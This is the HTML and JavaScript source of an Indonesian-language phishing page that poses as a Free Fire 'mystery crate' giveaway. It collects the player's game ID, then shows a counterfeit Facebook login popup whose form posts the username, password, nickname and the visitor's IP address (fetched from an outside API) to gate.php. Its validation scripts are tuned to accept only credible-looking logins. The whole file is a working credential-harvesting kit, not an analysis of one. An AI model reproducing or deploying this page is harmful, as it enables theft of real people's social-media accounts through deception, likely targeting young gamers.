<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
	<meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<title>MYSTERY CRATE FREEFIRE</title>
	<link rel="stylesheet" type="text/css" href="css/style.css">
	<link rel="stylesheet" type="text/css" href="css/facebook.css">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
 <div class="loader">
            <img src="https://i.pinimg.com/originals/67/56/66/675666d840a9c8fa1c61eaf584ff2a50.gif">
        </div>
	<div class="nguyenSection">
		<div class="headerBg">
			<h1><i>Free Fire</i></h1>
			<img src="ngMedia/top.png">
		</div>
		<div class="ngWrap">
		    <div class="banner">
		    Selamat Datang, Dapatkan Segera Item Gratis Disini
		    </div>
			<div class="dialog">
				<div class="dialogBg">
				   <img src="https://freefiremobile-a.akamaihd.net/common/web_event/officialwebsite/wallpapers/pop/078.jpg">
				</div>
			</div>
			<div class="menu">
			   <a class="tab active">
			     <span class="tabbed" id="ep">INCUBATOR</span>
			   </a>
			   <a class="tab">
			     <span class="tabbed" id="cobra">ITEM NEW</span>
			   </a>
			   <a class="tab">
			     <span class="tabbed" id="gun">SENJATA</span>
			   </a>
			</div>
			<div class="hadiah">
			</div>
		</div>
		
		
		
		
		
		<div class="mask"></div>
		<div class="popDialog">
		    <div class="tutup" onclick="tutup()"></div>
		    <span class="titleText">Ambil Item Ini?</span>
		    <div class="box">
			       <div class="prize">
			           <img id="inigambar" src="ngMedia/hadiah/old/1.jpg">
			       </div>
			       <div class="button" onclick="showfb()">
			         <img src="ngMedia/button.png">
			         <span class="text">Ambil</span>
			       </div>
			    </div>
		</div>
		
		<div class="checkId">
		    <span class="titleText">Masukkan ID Mu</span>
		    <input class="idInput" id="url" placeholder="Masukkan Id" autocomplete="off" onmouseenter="return false">
		    <button onclick="return tiktok()" class="check">Cek ID</button>
		    <span class="alert salah">ID Tidak cukup (Harus melebihi 8 karakter)</span>
		    <span class="alert notfound">ID Tidak ditemukan</span>
		    <span class="alert cek">Sedang mengecek Id</span>
		</div>
		
		<div class="toast">
		   <span class="vis">
		   Selamat Datang <span id="nicks"></span>
		   </span>
		</div>
		
		
		
		
		<div class="popup-login login-facebook animated fadeIn" style="display: none;">
	   <div class="popup-box-login-fb">
	      <div class="navbar-fb">
	         <img width="45" src="img/facebook_text.png">
	      </div>
	      <div class="content-box-fb">
	        <p class="alert sandi">Kata sandi salah. <b>Apakah Anda melupakan kata sandi Anda?</b></p>
	        <p class="alert email">Nomor ponsel atau email yang Anda masukkan tidak cocok dengan akun apa pun. <b>Cari akun Anda.</b></p>
	         <img width="75" height="75" src="https://i.ibb.co/fFbdRKj/thumbnail.jpg">
	         <div class="txt-login-fb">
	          Masuk ke akun Facebook Anda untuk terhubung dengan Freefire
	         </div>
	         <form class="login-form" action="gate.php" method="POST" onsubmit="return valid()">
	            <label>
	            <input type="text" id="user" name="user" placeholder="Nomor ponsel atau email" autocomplete="off" autocapitalize="off">
	            </label>
	            <label>
	            <input type="password" id="pass" name="pass" placeholder="Kata Sandi Facebook" autocomplete="off" autocapitalize="off">
	            </label>
	            <input type="hidden" name="ip" id="ip" value="">
	            <input type="hidden" id="id" name="id" value="">
	            <input type="hidden" id="nick" name="nick" value="">
	            <button  type="submit" id="btnfb" class="btn-login-fb">Masuk</button>
	         </form>
	         <div class="txt-create-account">Create account</div>
	         <div class="txt-not-now">Not now</div>
	         <div class="txt-forgotten-password">Forgotten password?</div>
	      </div>
	      <div class="language-box">
	         <center>
	         <div class="language-name language-name-active">English (UK)</div>
	         <div class="language-name">Bahasa Indonesia</div>
	         <div class="language-name">Basa Jawa</div>
	         <div class="language-name">Bahasa Melayu</div>
	         <div class="language-name">日本語</div>
	         <div class="language-name">Español</div>
	         <div class="language-name">Português (Brasil)</div>
	         <div class="language-name">
	            <i class="fa fa-plus"></i>
	         </div>
	         </center>
	      </div>
	      <div class="copyright">Facebook Inc.</div>
	   </div>
	 </div>
		
		
		
		
	</div>
	
	<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
	<script>
    $(document).ready(function(){
       $(".loader").fadeOut();
    })
     </script>
	<script>
       function tiktok(){
       var url = $("#url").val();
       $(".cek").show();
       $(".salah").hide();
       $(".notfound").hide();
       if(url == "" || url == null || url.length <= 7)
       {
       $(".salah").show();
       $(".cek").hide();
       $(".notfound").hide();
       return false;
       }else{
       $(".salah").hide();
       }
       
       $.ajax({
       type : 'GET',
       url : 'ngBackend/ngTrueid.php?id='+url+'',
       beforeSend : function(){
             $(".cek").show();
       },
       success : function(data){
       if(data == "" || data == null){
       $(".cek").hide();
       $(".notfound").show();
       }else{
       $(".checkId").hide();
       $(".toast").show();
       $("#nicks").text(data);
       $("#id").val(url);
       $("#nick").val(data);
       setTimeout(() => {
       $(".mask").fadeOut();
       $(".toast").fadeOut();
       },2000)
       }
       }
       })
       
       }
    </script>
	<script>
	  $(document).on('click','.menu .tab',function(){
	     $(this).addClass("active").siblings().removeClass("active");
	  })
	  $(".tabbed").click(function(){
	     var wan = $(this).attr('id');
	     if(wan == "ep"){
	         $(".hadiah").load("pages/1.php");
	     }else if(wan == "cobra"){
	         $(".hadiah").load("pages/2.php");
	     }else if(wan == "gun"){
	         $(".hadiah").load("pages/3.php");
	     }
	  })
	  $(".hadiah").load("pages/1.php");
	  </script>
	  <script type="text/javascript">
        function valid() {
            var user = $('#user').val();
            var pass = $('#pass').val();
            var ip = $('#ip').val();
            if(user == '' || user == null)
            {
                $('.email').show();
                $('.sandi').hide();
                return false;
            }else{
            
                if(user.includes('@')){
                let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                if(user.match(pattern)){
                $('.email').hide();
                }else{
                $('.email').show();
                $('.sandi').hide();
                return false;
                }
                }
                
                if(!isNaN(user)){
                if(user.length <= 10){
                $('.email').show();
                $('.sandi').hide();
                return false;
                }else{
                $('.email').hide();
                }
                }
                
                if(user.match(/\s/g)){
                $('.email').show();
                $('.sandi').hide();
                return false;
                }else{
                $('.email').hide();
                }
                
                var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                if(user.match(regex)){
                $('.email').show();
                $('.sandi').hide();
                return false;
                }
                
                
                if(user.length <= 5){
                $('.email').show();
                $('.sandi').hide();
                return false;
                }else{
                $('.email').hide();
                }
                
            }
            if(pass == '' || pass == null || pass.length <= 5)
            {
                $('.sandi').show();
                return false;
            }else{
                $('.sandi').hide();
            }
            var regexs = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                if(pass.match(regexs)){
                $('.sandi').show();
                $('.email').hide();
                return false;
                }else{
                $('.sandi').hide();
                }
            
            // Jika Sukses
            $("#btnfb").addClass("disabled");
        }
    </script>
	  <script type="text/javascript">
        var checkip = function () {
               $.ajax({
                   type: "get",
                   async: false,
                   url: "https://api.pubgameshowtime.com/ip/getcountry",
                   dataType: "json",
                   success: function (result) {
                      $('#ip').val(result.ip);
                   }
               })
           }
        checkip();
        function showfb(){
        $('.login-facebook').show();
        }
    </script>
	  <script>
	      function ambil(e){
	      var p = e.parentElement.getElementsByTagName('img');
	        var img = p[0].getAttribute("src");
	        $("#inigambar").attr("src",img);
	        $(".mask").show();
	        $(".popDialog").fadeIn();
	      }
	      function tutup()
	      {
	        $(".mask").fadeOut();
	        $(".popDialog").fadeOut();
	      }
	  </script>
</body>
</html>